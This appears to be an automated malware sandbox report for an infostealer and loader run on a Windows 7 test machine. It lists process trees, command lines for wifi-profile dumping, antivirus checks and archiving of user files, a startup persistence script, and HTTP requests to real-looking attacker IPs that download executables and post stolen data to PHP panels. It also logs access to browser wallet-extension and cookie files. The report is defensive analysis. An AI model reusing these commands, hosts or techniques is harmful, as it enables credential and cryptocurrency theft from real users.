Category | Machine | Started | Completed |
---|---|---|---|
FILE | s1_win7_x6403_us | March 8, 2025, 12:08 p.m. | March 8, 2025, 12:31 p.m. |
-
-
-
-
-
-
-
rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\test22\AppData\Roaming\6c7109f0f87b7e\cred64.dll, Main
2088-
rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\test22\AppData\Roaming\6c7109f0f87b7e\cred64.dll, Main
2208-
netsh.exe netsh wlan show profiles
2340 -
powershell.exe powershell -Command Compress-Archive -Path 'C:\Users\test22\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\test22\AppData\Local\Temp\832866432405_Desktop.zip' -CompressionLevel Optimal
296
-
-
-
rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\test22\AppData\Roaming\6c7109f0f87b7e\clip64.dll, Main
1688
-
-
-
v6Oqdnc.exe "C:\Users\test22\AppData\Local\Temp\10079230101\v6Oqdnc.exe"
2344 -
HmngBpR.exe "C:\Users\test22\AppData\Local\Temp\10111840101\HmngBpR.exe"
2488 -
-
-
expand.exe expand Go.pub Go.pub.bat
316 -
tasklist.exe tasklist
2012 -
findstr.exe findstr /I "opssvc wrsa"
2564 -
tasklist.exe tasklist
516 -
findstr.exe findstr "bdservicehost AvastUI AVGUI nsWscSvc ekrn SophosHealth"
2516 -
cmd.exe cmd /c md 353090
1656 -
extrac32.exe extrac32 /Y /E Really.pub
2408 -
findstr.exe findstr /V "posted" Good
1520 -
cmd.exe cmd /c copy /b 353090\Seat.com + Pf + Somewhere + Volumes + Commission + Lane + Hit + Strong + Copied + Wearing + Acquire 353090\Seat.com
2772 -
cmd.exe cmd /c copy /b ..\Maintains.pub + ..\Legislation.pub + ..\Blood.pub + ..\Document.pub + ..\Breaks.pub + ..\Both.pub + ..\Explicitly.pub + ..\Governor.pub + ..\Bull.pub + ..\Comparison.pub + ..\Performing.pub + ..\Gate.pub + ..\Republican.pub + ..\Reverse.pub + ..\Thousand.pub + ..\Apartments.pub + ..\Swingers.pub + ..\Urban.pub + ..\Robert.pub + ..\Regulation.pub + ..\Confusion.pub + ..\Listening.pub + ..\Generating.pub + ..\Argentina.pub + ..\Amenities.pub + ..\Vacation.pub + ..\Vampire.pub + ..\Trademarks.pub + ..\Distinguished.pub + ..\Silly.pub + ..\Hell.pub + ..\Worcester.pub + ..\Concept.pub + ..\Enlarge.pub + ..\Preference.pub + ..\Poem.pub m
2548 -
Seat.com Seat.com m
1972 -
choice.exe choice /d y /t 5
1208
-
-
-
9hUDDVk.exe "C:\Users\test22\AppData\Local\Temp\10114440101\9hUDDVk.exe"
1200 -
pwHxMTy.exe "C:\Users\test22\AppData\Local\Temp\10114630101\pwHxMTy.exe"
1504 -
T0QdO0l.exe "C:\Users\test22\AppData\Local\Temp\10115790101\T0QdO0l.exe"
880 -
powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy remotesigned -File "C:\Users\test22\AppData\Local\Temp\10119590141\ogfNbjS.ps1"
2840 -
-
futors.exe "C:\Users\test22\AppData\Local\Temp\97419fb2c0\futors.exe"
2824
-
-
yUI6F6C.exe "C:\Users\test22\AppData\Local\Temp\10124820101\yUI6F6C.exe"
916 -
CgmaT61.exe "C:\Users\test22\AppData\Local\Temp\10124840101\CgmaT61.exe"
2376 -
-
cmd.exe cmd.exe /c 67cb736da8518.vbs
3168
-
-
V0Bt74c.exe "C:\Users\test22\AppData\Local\Temp\10126920101\V0Bt74c.exe"
3248
-
-
-
2q1116.exe C:\Users\test22\AppData\Local\Temp\IXP001.TMP\2q1116.exe
2404
-
-
3H65J.exe C:\Users\test22\AppData\Local\Temp\IXP000.TMP\3H65J.exe
2552
-
-
explorer.exe C:\Windows\Explorer.EXE
1236
Name | Response | Post-Analysis Lookup |
---|---|---|
github.com | 20.200.245.247 |
IP Address | Status | Action |
---|---|---|
164.124.101.2 | Active | Moloch |
176.113.115.6 | Active | Moloch |
176.113.115.7 | Active | Moloch |
185.125.50.8 | Active | Moloch |
185.215.113.16 | Active | Moloch |
185.215.113.209 | Active | Moloch |
185.215.113.97 | Active | Moloch |
20.200.245.247 | Active | Moloch |
45.93.20.28 | Active | Moloch |
45.33.6.223 | Active | Moloch |
Suricata Alerts
Suricata TLS
No Suricata TLS
registry | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid |
pdb_path | wextract.pdb |
file | C:\Program Files\Mozilla Firefox\firefox.exe |
registry | HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome\DisplayVersion |
registry | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\firefox.exe\Path |
resource name | AVI |
suspicious_features | GET method with no useragent header, Connection to IP address | suspicious_request | GET http://45.93.20.28/ | ||||||
suspicious_features | POST method with no referer header, POST method with no useragent header, Connection to IP address | suspicious_request | POST http://45.93.20.28/85a1cacf11314eb8.php | ||||||
suspicious_features | POST method with no referer header, POST method with no useragent header, Connection to IP address | suspicious_request | POST http://176.113.115.6/Ni9kiput/index.php | ||||||
suspicious_features | GET method with no useragent header, Connection to IP address | suspicious_request | GET http://45.93.20.28/c66c0eade263c9a8/sqlite3.dll | ||||||
suspicious_features | GET method with no useragent header, Connection to IP address | suspicious_request | GET http://176.113.115.7/files/7868598855/zY9sqWs.exe | ||||||
suspicious_features | GET method with no useragent header, Connection to IP address | suspicious_request | GET http://45.93.20.28/c66c0eade263c9a8/freebl3.dll | ||||||
suspicious_features | GET method with no useragent header, Connection to IP address | suspicious_request | GET http://45.93.20.28/c66c0eade263c9a8/mozglue.dll | ||||||
suspicious_features | POST method with no referer header, POST method with no useragent header, Connection to IP address | suspicious_request | POST http://185.125.50.8/mVsXkjvb3/index.php | ||||||
suspicious_features | GET method with no useragent header, Connection to IP address | suspicious_request | GET http://176.113.115.7/files/7834629666/v6Oqdnc.exe | ||||||
suspicious_features | GET method with no useragent header, Connection to IP address | suspicious_request | GET http://45.93.20.28/c66c0eade263c9a8/msvcp140.dll | ||||||
suspicious_features | GET method with no useragent header, Connection to IP address | suspicious_request | GET http://45.93.20.28/c66c0eade263c9a8/nss3.dll | ||||||
suspicious_features | GET method with no useragent header, Connection to IP address | suspicious_request | GET http://45.93.20.28/c66c0eade263c9a8/softokn3.dll | ||||||
suspicious_features | GET method with no useragent header, Connection to IP address | suspicious_request | GET http://45.93.20.28/c66c0eade263c9a8/vcruntime140.dll | ||||||
suspicious_features | GET method with no useragent header, Connection to IP address | suspicious_request | GET http://176.113.115.7/files/7212159662/HmngBpR.exe | ||||||
suspicious_features | GET method with no useragent header, Connection to IP address | suspicious_request | GET http://185.125.50.8/mVsXkjvb3/Plugins/cred64.dll | ||||||
suspicious_features | GET method with no useragent header, Connection to IP address | suspicious_request | GET http://176.113.115.7/files/5419477542/ADFoyxP.exe | ||||||
suspicious_features | GET method with no useragent header, Connection to IP address | suspicious_request | GET http://185.125.50.8/mVsXkjvb3/Plugins/clip64.dll | ||||||
suspicious_features | GET method with no useragent header, Connection to IP address | suspicious_request | GET http://176.113.115.7/files/8032894631/9hUDDVk.exe | ||||||
suspicious_features | GET method with no useragent header, Connection to IP address | suspicious_request | GET http://176.113.115.7/files/5153162918/pwHxMTy.exe | ||||||
suspicious_features | GET method with no useragent header, Connection to IP address | suspicious_request | GET http://176.113.115.7/files/6491397189/T0QdO0l.exe | ||||||
suspicious_features | GET method with no useragent header, Connection to IP address | suspicious_request | GET http://176.113.115.7/files/7853925217/ogfNbjS.ps1 | ||||||
suspicious_features | GET method with no useragent header, Connection to IP address | suspicious_request | GET http://185.215.113.16/test/amnew.exe | ||||||
suspicious_features | GET method with no useragent header, Connection to IP address | suspicious_request | GET http://176.113.115.7/files/5526411762/yUI6F6C.exe | ||||||
suspicious_features | POST method with no referer header, POST method with no useragent header, Connection to IP address | suspicious_request | POST http://185.215.113.209/Di0Her478/index.php | ||||||
suspicious_features | GET method with no useragent header, Connection to IP address | suspicious_request | GET http://176.113.115.7/files/5526411762/CgmaT61.exe | ||||||
suspicious_features | GET method with no useragent header, Connection to IP address | suspicious_request | GET http://176.113.115.7/files/2043702969/9zQZD2e.exe | ||||||
suspicious_features | GET method with no useragent header, Connection to IP address | suspicious_request | GET http://176.113.115.7/files/6691015685/V0Bt74c.exe |
request | GET http://45.93.20.28/ |
request | POST http://45.93.20.28/85a1cacf11314eb8.php |
request | POST http://176.113.115.6/Ni9kiput/index.php |
request | GET http://45.93.20.28/c66c0eade263c9a8/sqlite3.dll |
request | GET http://176.113.115.7/files/7868598855/zY9sqWs.exe |
request | GET http://45.93.20.28/c66c0eade263c9a8/freebl3.dll |
request | GET http://45.93.20.28/c66c0eade263c9a8/mozglue.dll |
request | POST http://185.125.50.8/mVsXkjvb3/index.php |
request | GET http://176.113.115.7/files/7834629666/v6Oqdnc.exe |
request | GET http://45.93.20.28/c66c0eade263c9a8/msvcp140.dll |
request | GET http://45.93.20.28/c66c0eade263c9a8/nss3.dll |
request | GET http://45.93.20.28/c66c0eade263c9a8/softokn3.dll |
request | GET http://45.93.20.28/c66c0eade263c9a8/vcruntime140.dll |
request | GET http://176.113.115.7/files/7212159662/HmngBpR.exe |
request | GET http://185.125.50.8/mVsXkjvb3/Plugins/cred64.dll |
request | GET http://176.113.115.7/files/5419477542/ADFoyxP.exe |
request | GET http://185.125.50.8/mVsXkjvb3/Plugins/clip64.dll |
request | GET http://176.113.115.7/files/8032894631/9hUDDVk.exe |
request | GET http://176.113.115.7/files/5153162918/pwHxMTy.exe |
request | GET http://176.113.115.7/files/6491397189/T0QdO0l.exe |
request | GET http://176.113.115.7/files/7853925217/ogfNbjS.ps1 |
request | GET http://185.215.113.16/test/amnew.exe |
request | GET http://176.113.115.7/files/5526411762/yUI6F6C.exe |
request | POST http://185.215.113.209/Di0Her478/index.php |
request | GET http://176.113.115.7/files/5526411762/CgmaT61.exe |
request | GET http://176.113.115.7/files/2043702969/9zQZD2e.exe |
request | GET http://176.113.115.7/files/6691015685/V0Bt74c.exe |
request | POST http://45.93.20.28/85a1cacf11314eb8.php |
request | POST http://176.113.115.6/Ni9kiput/index.php |
request | POST http://185.125.50.8/mVsXkjvb3/index.php |
request | POST http://185.215.113.209/Di0Her478/index.php |
description | Gxtuum.exe tried to sleep 182 seconds, actually delayed analysis time by 182 seconds | |||
description | rapes.exe tried to sleep 1181 seconds, actually delayed analysis time by 1181 seconds | |||
description | 3H65J.exe tried to sleep 178 seconds, actually delayed analysis time by 178 seconds |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\ThirdPartyModuleList64\Local Extension Settings\cjmkndjhnagcfbpiemnkdpomccnjblmj\CURRENT |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\SSLErrorAssistant\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn\CURRENT |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\ShaderCache\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao\CURRENT |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn\CURRENT |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\FontLookupTableCache\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm\CURRENT |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\pnacl\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk\CURRENT |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\recovery\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof\CURRENT |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\FileTypePolicies\Local Extension Settings\djclckkglechooblngghdinmeemkbgci\CURRENT |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Last Version\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk\CURRENT |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Last Version\Local Extension Settings\lpilbniiabackdjcionkobglmddfbcjo\CURRENT |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\ThirdPartyModuleList64\Local Extension Settings\apenkfbbpmhihehmihndmmcdanacolnh\CURRENT |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\BrowserMetrics\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln\CURRENT |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\PepperFlash\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd\CURRENT |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\OnDeviceHeadSuggestModel\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic\CURRENT |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Safe Browsing Cookies-journal\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba\CURRENT |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\Network\Cookies |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\CertificateTransparency\Local Extension Settings\aodkkagnadcbobfpggfnjeongemjbjca\CURRENT |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.2_0\_locales\fil\messages.json\Network\Cookies |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\SwReporter\Local Extension Settings\aijcbedoijmgnlmjeegjaglmepbmpkpi\CURRENT |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\PnaclTranslationCache\Local Extension Settings\ciojocpkclfflombbcfigcijjcbkmhaf\CURRENT |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\SafetyTips\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj\CURRENT |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\RecoveryImproved\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp\CURRENT |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\000003.log\Network\Cookies |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opfgelmcmbiajamepnmloijbpoleiama\CURRENT |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.5_0\_locales\sv\Network\Cookies |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\TLSDeprecationConfig\Local Extension Settings\fiikommddbeccaoicoejoniammnalkfa\CURRENT |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\OriginTrials\Local Extension Settings\oboonakemofpalcgghocfoadofidjkkk\CURRENT |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\ShaderCache\GPUCache\data_2\Network\Cookies |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\TrustTokenKeyCommitments\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn\CURRENT |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\OnDeviceHeadSuggestModel\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof\CURRENT |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Safe Browsing Cookies-journal\Local Extension Settings\fooolghllnmhmmndgjiamiiodkpenpbb\CURRENT |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\PnaclTranslationCache\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae\CURRENT |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\FontLookupTableCache\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci\CURRENT |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\recovery\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma\CURRENT |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ghbmnnjooekpmoecnnnilnnbdlolhkhi\LOCK\Network\Cookies |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm\8620.824.0.0_0\_locales\fa\messages.json\Network\Cookies |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\ThirdPartyModuleList64\Local Extension Settings\bfogiafebfohielmmehodmfbbebbbpei\CURRENT |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\CrashpadMetrics-active.pma\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj\CURRENT |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\ZxcvbnData\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon\CURRENT |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadata\MANIFEST-000001\Network\Cookies |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\SafetyTips\Local Extension Settings\naepdomgkenhinolocfifgehidddafch\CURRENT |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\TLSDeprecationConfig\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb\CURRENT |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\omaabbefbmiijedngplfjmnooppbclkk\CURRENT |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\SafetyTips\Local Extension Settings\pdadjkfkgcafgbceimcpbkalnfnepbnk\CURRENT |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\TLSDeprecationConfig\Local Extension Settings\bmikpgodpkclnkgmnpphehdgcimmided\CURRENT |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Safe Browsing\Local Extension Settings\fdjamakpfbbddfjaooikfcpapjohcfmg\CURRENT |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\BrowserMetrics\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik\CURRENT |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\TrustTokenKeyCommitments\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobl\CURRENT |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\WidevineCdm\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba\CURRENT |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Safe Browsing Channel IDs\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch\CURRENT |
file | C:\Users\test22\AppData\Local\Temp\10114440101\9hUDDVk.exe |
file | C:\Users\test22\AppData\Local\Temp\IXP001.TMP\1N22O8.exe |
file | C:\Users\test22\AppData\Roaming\TypeName.exe |
file | C:\Users\test22\AppData\Local\Temp\10079230101\v6Oqdnc.exe |
file | C:\Users\test22\AppData\Local\Temp\10115790101\T0QdO0l.exe |
file | C:\Users\test22\AppData\Local\Temp\10114630101\pwHxMTy.exe |
file | C:\Users\test22\AppData\Local\Temp\10119590141\ogfNbjS.ps1 |
file | C:\ProgramData\mozglue.dll |
file | C:\Users\test22\AppData\Roaming\6c7109f0f87b7e\clip64.dll |
file | C:\Users\test22\AppData\Local\Temp\IXP000.TMP\3H65J.exe |
file | C:\Users\test22\AppData\Local\Temp\10126920101\V0Bt74c.exe |
file | C:\ProgramData\vcruntime140.dll |
file | C:\Users\test22\AppData\Local\Temp\go.pub.bat |
file | C:\Users\test22\AppData\Local\Temp\10125900101\9zQZD2e.exe |
file | C:\Users\test22\AppData\Local\Temp\353090\Seat.com |
file | C:\Users\test22\AppData\Local\Temp\10121660101\amnew.exe |
file | C:\Users\test22\AppData\Local\Temp\IXP000.TMP\67cb736da8518.vbs |
file | C:\ProgramData\msvcp140.dll |
file | C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TypeName.vbs |
file | C:\Users\test22\AppData\Local\Temp\10111840101\HmngBpR.exe |
file | C:\Users\test22\AppData\Local\Temp\10075800101\zY9sqWs.exe |
file | C:\Users\test22\AppData\Local\Temp\10112790101\ADFoyxP.exe |
file | C:\Users\test22\AppData\Local\Temp\IXP001.TMP\2q1116.exe |
file | C:\ProgramData\freebl3.dll |
file | C:\ProgramData\softokn3.dll |
file | C:\Users\test22\AppData\Local\Temp\10124840101\CgmaT61.exe |
file | C:\Users\test22\AppData\Local\Temp\10124820101\yUI6F6C.exe |
file | C:\ProgramData\nss3.dll |
file | C:\Users\test22\AppData\Local\Temp\IXP000.TMP\J5j65.exe |
file | C:\Users\test22\AppData\Roaming\6c7109f0f87b7e\cred64.dll |
file | C:\Users\test22\AppData\Local\Temp\10119590141\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk |
file | C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk |
cmdline | Powershell.exe -executionpolicy remotesigned -File "C:\Users\test22\AppData\Local\Temp\10119590141\ogfNbjS.ps1" |
cmdline | cmd.exe /c 67cb736da8518.vbs |
cmdline | C:\Windows\System32\cmd.exe /c expand Go.pub Go.pub.bat & Go.pub.bat |
cmdline | powershell -Command Compress-Archive -Path 'C:\Users\test22\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\test22\AppData\Local\Temp\832866432405_Desktop.zip' -CompressionLevel Optimal |
cmdline | "C:\Windows\system32\cmd.exe" /c expand Go.pub Go.pub.bat & Go.pub.bat |
cmdline | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy remotesigned -File "C:\Users\test22\AppData\Local\Temp\10119590141\ogfNbjS.ps1" |
file | C:\Users\test22\AppData\Local\Temp\bb556cff4a\rapes.exe |
file | C:\Users\test22\AppData\Local\Temp\10079230101\v6Oqdnc.exe |
file | C:\Users\test22\AppData\Local\Temp\10111840101\HmngBpR.exe |
file | C:\Users\test22\AppData\Local\Temp\10112790101\ADFoyxP.exe |
file | C:\Users\test22\AppData\Local\Temp\10114440101\9hUDDVk.exe |
file | C:\Users\test22\AppData\Local\Temp\10114630101\pwHxMTy.exe |
file | C:\Users\test22\AppData\Local\Temp\10124840101\CgmaT61.exe |
file | C:\Users\test22\AppData\Local\Temp\10125900101\9zQZD2e.exe |
file | C:\Users\test22\AppData\Local\Temp\10126920101\V0Bt74c.exe |
file | C:\Users\test22\AppData\Local\Temp\845cfbab99\Gxtuum.exe |
file | C:\Users\test22\AppData\Local\Temp\353090\Seat.com |
file | C:\Users\test22\AppData\Local\Temp\97419fb2c0\futors.exe |
file | C:\Users\test22\AppData\Local\Temp\IXP000.TMP\67cb736da8518.vbs |
file | C:\Users\test22\AppData\Local\Temp\845cfbab99\Gxtuum.exe |
file | C:\Users\test22\AppData\Local\Temp\10079230101\v6Oqdnc.exe |
file | C:\Users\test22\AppData\Local\Temp\97419fb2c0\futors.exe |
file | C:\Users\test22\AppData\Roaming\6c7109f0f87b7e\clip64.dll |
file | C:\Users\test22\AppData\Local\Temp\353090\Seat.com |
file | C:\Users\test22\AppData\Local\Temp\10126920101\V0Bt74c.exe |
file | C:\Users\test22\AppData\Local\Temp\10114440101\9hUDDVk.exe |
file | C:\Users\test22\AppData\Local\Temp\10112790101\ADFoyxP.exe |
file | C:\Users\test22\AppData\Roaming\TypeName.exe |
file | C:\Users\test22\AppData\Local\Temp\10114630101\pwHxMTy.exe |
file | C:\Users\test22\AppData\Local\Temp\10124840101\CgmaT61.exe |
file | C:\Users\test22\AppData\Local\Temp\bb556cff4a\rapes.exe |
wmi | SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process |